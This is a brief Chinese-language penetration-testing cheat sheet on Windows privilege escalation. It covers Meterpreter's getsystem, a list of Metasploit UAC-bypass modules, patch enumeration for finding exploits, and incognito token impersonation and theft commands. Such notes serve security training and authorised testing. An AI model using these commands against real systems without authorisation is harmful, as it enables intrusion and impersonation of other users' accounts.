其他提权方法
meterpreter>getsystem
MSF内置有多个bypassuac模块,原理有所不同,使用方法类似,运行后返回一个新会话后再次执行getsystem获取系统权限。
search bypassuac Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 1 exploit/windows/local/bypassuac 2010-12-31 excellent No Windows Escalate UAC Protection Bypass 2 exploit/windows/local/bypassuac_comhijack 1900-01-01 excellent Yes Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) 3 exploit/windows/local/bypassuac_eventvwr 2016-08-15 excellent Yes Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key) 4 exploit/windows/local/bypassuac_fodhelper 2017-05-12 excellent Yes Windows UAC Protection Bypass (Via FodHelper Registry Key) 5 exploit/windows/local/bypassuac_injection 2010-12-31 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) 6 exploit/windows/local/bypassuac_injection_winsxs 2017-04-06 excellent No Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS 7 exploit/windows/local/bypassuac_sluihijack 2018-01-15 excellent Yes Windows UAC Protection Bypass (Via Slui File Handler Hijack) 8 exploit/windows/local/bypassuac_vbs 2015-08-22 excellent No Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)使用MSF的enum_patches模块,收集补丁信息,然后查找可用exploits进行提权
自行根据不同的补丁所存在的漏洞使用msf存在的脚本进行权限提升
use incognito #help incognito 查看帮助
list_tokens -u #查看可用的token
impersonate_token PIG\\testpig或者impersonate_token 'PIG\testpig' #假冒testpig的token,不加单引号需使用\\
execute -f cmd.exe -i -t # -t 使用假冒的token执行cmd.exe,亦可以直接输入shell进入当前token的终端
rev2self #返回原始token
steal_token <pid值> #从指定进程中窃取token,先ps列出进程详细信息
drop_token #删除窃取的token
